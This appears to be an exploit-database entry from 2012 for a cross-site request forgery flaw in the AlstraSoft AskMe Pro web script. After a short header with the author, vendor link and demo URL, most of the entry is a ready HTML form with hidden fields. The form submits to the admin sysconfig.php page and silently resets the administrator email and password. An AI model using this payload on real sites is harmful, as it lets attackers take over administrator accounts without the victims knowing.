AlstraSoft AskMe Pro CSRF



EKU-ID: 1821 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-31 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: AlstraSoft AskMe Pro CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/alstrasoft-askme-pro-run-your-own-google-answers/19900/
# Category::  webapps
# Demo : http://www.blizsoft.com/ask/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form action="target.com/admin/sysconfig.php" method="get">
<input name="admin_email" size="35" maxlength="200" value="mail@mail.com" type="hidden">
<input name="admin_pass" size="35" maxlength="200" value="newpassword" type="hidden">
<input name="Submit" value="Edit Info" class="buttonwhite" type="submit">
</form>